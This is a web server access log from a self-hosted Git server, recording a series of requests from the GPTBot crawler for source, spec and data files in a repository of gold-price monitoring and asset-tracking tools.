"/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png?display=rendered" [Client 74.7.227.38] [Length 10817] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" +[17/Feb/2026:17:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py?display=source" [Client 74.7.227.38] [Length 19407] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21411] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" +[17/Feb/2026:17:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17364] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" +[17/Feb/2026:17:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 11996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py?display=source" [Client 74.7.227.38] [Length 21366] [Gzip 7.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" +[17/Feb/2026:17:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec?display=source" [Client 74.7.227.38] [Length 12417] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico?display=rendered" [Client 74.7.227.38] [Length 10806] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" +[17/Feb/2026:17:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll?display=rendered" [Client 74.7.227.38] [Length 10833] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:17:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" +[17/Feb/2026:17:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 14498] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec?display=source" [Client 74.7.227.38] [Length 12377] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py?display=source" [Client 74.7.227.38] [Length 18018] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" +[17/Feb/2026:17:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe?display=rendered" [Client 74.7.227.38] [Length 10848] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" +[17/Feb/2026:17:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21444] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py?display=source" [Client 74.7.227.38] [Length 20805] [Gzip 6.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv?display=source" [Client 74.7.227.38] [Length 11252] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec?display=source" [Client 74.7.227.38] [Length 12350] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec?display=source" [Client 74.7.227.38] [Length 12412] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py?display=source" [Client 74.7.227.38] [Length 17575] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" +[17/Feb/2026:17:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" +[17/Feb/2026:17:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17366] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py?display=source" [Client 74.7.227.38] [Length 20809] [Gzip 6.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec?display=source" [Client 74.7.227.38] [Length 12289] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico?display=rendered" [Client 74.7.227.38] [Length 10805] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" +[17/Feb/2026:17:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" +[17/Feb/2026:17:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py?display=source" [Client 74.7.227.38] [Length 19911] [Gzip 6.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py?display=source" [Client 74.7.227.38] [Length 19879] [Gzip 6.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec?display=source" [Client 74.7.227.38] [Length 12386] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec?display=source" [Client 74.7.227.38] [Length 12376] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10851] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" +[17/Feb/2026:17:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" +[17/Feb/2026:17:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" +[17/Feb/2026:17:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec?display=source" [Client 74.7.227.38] [Length 12421] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec?display=source" [Client 74.7.227.38] [Length 12214] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12538] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:17:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" +[17/Feb/2026:17:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr 